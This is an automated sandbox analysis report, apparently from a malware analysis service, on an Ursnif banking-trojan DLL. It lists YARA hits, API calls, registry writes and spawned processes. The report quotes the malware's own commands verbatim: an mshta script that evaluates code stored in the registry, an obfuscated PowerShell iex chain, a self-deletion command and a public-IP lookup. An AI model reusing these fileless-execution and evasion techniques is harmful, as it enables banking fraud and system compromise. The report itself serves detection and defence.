                      Source: Yara matchFile source: 3.3.rundll32.exe.52194a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.519a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.505479603.0000000004B79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.508865065.0000000004F1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.449708876.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.447845466.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.446537800.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373077205.000000000519A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373165051.0000000005219000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.324102664.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323570193.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.375616313.000000000509C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323251316.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373340776.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322813142.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.324135232.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322932603.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.370749098.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323857679.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323438533.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4452, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6824, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6364, type: MEMORYSTR
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b794a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b794a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5246b48.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.52194a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5246b48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.519a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.52194a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.519a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.505479603.0000000004B79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.508865065.0000000004F1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.449708876.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.447845466.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.446537800.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373077205.000000000519A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373165051.0000000005219000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Disables SPDY (HTTP compression, likely to perform web injects)
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01005FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_01005FBB

                      System Summary

                      barindex
                      Writes registry values via WMI
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: zs5n5sI6N2.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 272
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01004BF13_2_01004BF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010016453_2_01001645
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0100829C3_2_0100829C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B83DB03_2_05B83DB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B7154D3_2_05B7154D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B7D7F13_2_05B7D7F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B667CA3_2_05B667CA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B7FF4D3_2_05B7FF4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B6B2383_2_05B6B238
                      Source: C:\Windows\System32\control.exeCode function: 30_2_007FB4B830_2_007FB4B8
                      Source: C:\Windows\System32\control.exeCode function: 30_2_007F966030_2_007F9660
                      Source: C:\Windows\System32\control.exeCode function: 30_2_007FEEF830_2_007FEEF8
                      Source: C:\Windows\System32\control.exeCode function: 30_2_008198A830_2_008198A8
                      Source: C:\Windows\System32\control.exeCode function: 30_2_008180A830_2_008180A8
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0080283030_2_00802830
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0081785030_2_00817850
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0080186430_2_00801864
                      Source: C:\Windows\System32\control.exeCode function: 30_2_007F716C30_2_007F716C
                      Source: C:\Windows\System32\control.exeCode function: 30_2_008151A830_2_008151A8
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0080B9E030_2_0080B9E0
                      Source: C:\Windows\System32\control.exeCode function: 30_2_007F511030_2_007F5110
                      Source: C:\Windows\System32\control.exeCode function: 30_2_007F410C30_2_007F410C
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0080E12030_2_0080E120
                      Source: C:\Windows\System32\control.exeCode function: 30_2_00818AC030_2_00818AC0
                      Source: C:\Windows\System32\control.exeCode function: 30_2_00812AD830_2_00812AD8
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0081C22030_2_0081C220
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0080424030_2_00804240
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0080124830_2_00801248
                      Source: C:\Windows\System32\control.exeCode function: 30_2_008173EC30_2_008173EC
                      Source: C:\Windows\System32\control.exeCode function: 30_2_00806CA430_2_00806CA4
                      Source: C:\Windows\System32\control.exeCode function: 30_2_008134C030_2_008134C0
                      Source: C:\Windows\System32\control.exeCode function: 30_2_007F3C3C30_2_007F3C3C
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0081D4D430_2_0081D4D4
                      Source: C:\Windows\System32\control.exeCode function: 30_2_007FD40430_2_007FD404
                      Source: C:\Windows\System32\control.exeCode function: 30_2_007F34D830_2_007F34D8
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0081242830_2_00812428
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0081AC5030_2_0081AC50
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0080C46C30_2_0080C46C
                      Source: C:\Windows\System32\control.exeCode function: 30_2_00817DB430_2_00817DB4
                      Source: C:\Windows\System32\control.exeCode function: 30_2_007F9D1C30_2_007F9D1C
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0080CD1C30_2_0080CD1C
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0081053030_2_00810530
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0081568430_2_00815684
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0080BED030_2_0080BED0
                      Source: C:\Windows\System32\control.exeCode function: 30_2_00802EE830_2_00802EE8
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0081163830_2_00811638
                      Source: C:\Windows\System32\control.exeCode function: 30_2_007F1EA830_2_007F1EA8
                      Source: C:\Windows\System32\control.exeCode function: 30_2_00811E5C30_2_00811E5C
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0080867030_2_00808670
                      Source: C:\Windows\System32\control.exeCode function: 30_2_007F572C30_2_007F572C
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0081772C30_2_0081772C
                      Source: C:\Windows\System32\control.exeCode function: 30_2_00804F5C30_2_00804F5C
                      Source: C:\Windows\System32\control.exeCode function: 30_2_00806F7830_2_00806F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B78E57 CreateProcessAsUserW,3_2_05B78E57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01006D0A NtMapViewOfSection,3_2_01006D0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0100190C GetProcAddress,NtCreateSection,memset,3_2_0100190C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01004321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_01004321
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010084C1 NtQueryVirtualMemory,3_2_010084C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B76DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,3_2_05B76DE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B674AE NtQueryInformationProcess,3_2_05B674AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B6C431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_05B6C431
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B70782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,3_2_05B70782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B7BE80 NtMapViewOfSection,3_2_05B7BE80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B761AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,3_2_05B761AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B6710A GetProcAddress,NtCreateSection,memset,3_2_05B6710A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B77950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_05B77950
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B700DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,3_2_05B700DC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B7A806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,3_2_05B7A806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B72331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,3_2_05B72331
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B75312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_05B75312
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B664C4 memset,NtQueryInformationProcess,3_2_05B664C4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B6B7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,3_2_05B6B7D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B6D77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,3_2_05B6D77A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B636BB NtGetContextThread,RtlNtStatusToDosError,3_2_05B636BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B610C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,3_2_05B610C7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B73829 NtQuerySystemInformation,RtlNtStatusToDosError,3_2_05B73829
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B7EAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,3_2_05B7EAC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B75220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_05B75220
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0080583C NtCreateSection,30_2_0080583C
                      Source: C:\Windows\System32\control.exeCode function: 30_2_007F40C0 NtReadVirtualMemory,30_2_007F40C0
                      Source: C:\Windows\System32\control.exeCode function: 30_2_008041D8 NtMapViewOfSection,30_2_008041D8
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0081A148 NtQueryInformationProcess,30_2_0081A148
                      Source: C:\Windows\System32\control.exeCode function: 30_2_007FAA6C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,30_2_007FAA6C
                      Source: C:\Windows\System32\control.exeCode function: 30_2_008104CC NtAllocateVirtualMemory,30_2_008104CC
                      Source: C:\Windows\System32\control.exeCode function: 30_2_007F6D24 NtWriteVirtualMemory,30_2_007F6D24
                      Source: C:\Windows\System32\control.exeCode function: 30_2_007F65E4 NtQueryInformationToken,NtQueryInformationToken,NtClose,30_2_007F65E4
                      Source: C:\Windows\System32\control.exeCode function: 30_2_007F9660 NtSetContextThread,NtUnmapViewOfSection,NtClose,30_2_007F9660
                      Source: C:\Windows\System32\control.exeCode function: 30_2_0082F002 NtProtectVirtualMemory,NtProtectVirtualMemory,30_2_0082F002
                      Source: zs5n5sI6N2.dllBinary or memory string: OriginalFilenamemyfile.exe$ vs zs5n5sI6N2.dll
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: zs5n5sI6N2.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: zs5n5sI6N2.dllReversingLabs: Detection: 41%
                      Source: zs5n5sI6N2.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 272
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 408
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 436
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cwbm='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cwbm).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famnsyvweq ([System.Text.Encoding]::ASCII.GetString((asytsrjo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBB61.tmp" "c:\Users\user\AppData\Local\Temp\rn2v1u0v\CSCE8729092494447E68BAFD2B3DE7C4FE.TMP"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDBAB.tmp" "c:\Users\user\AppData\Local\Temp\0rxpcrxp\CSC81748258BEC6426288BE9680C960B04E.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\zs5n5sI6N2.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1759.bi1"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famnsyvweq ([System.Text.Encoding]::ASCII.GetString((asytsrjo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBB61.tmp" "c:\Users\user\AppData\Local\Temp\rn2v1u0v\CSCE8729092494447E68BAFD2B3DE7C4FE.TMP"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDBAB.tmp" "c:\Users\user\AppData\Local\Temp\0rxpcrxp\CSC81748258BEC6426288BE9680C960B04E.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\zs5n5sI6N2.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1759.bi1"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220525Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E47.tmpJump to behavior
                      Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@29/29@0/2
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010068BD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,3_2_010068BD
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{68A2BABC-A7A2-DABF-711C-CBAE35102FC2}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_01
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{DC3210A8-8B30-6ECC-F5D0-EF82F90493D6}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3456
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{80D36C7A-DFB0-B2C8-69B4-8306AD28679A}
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
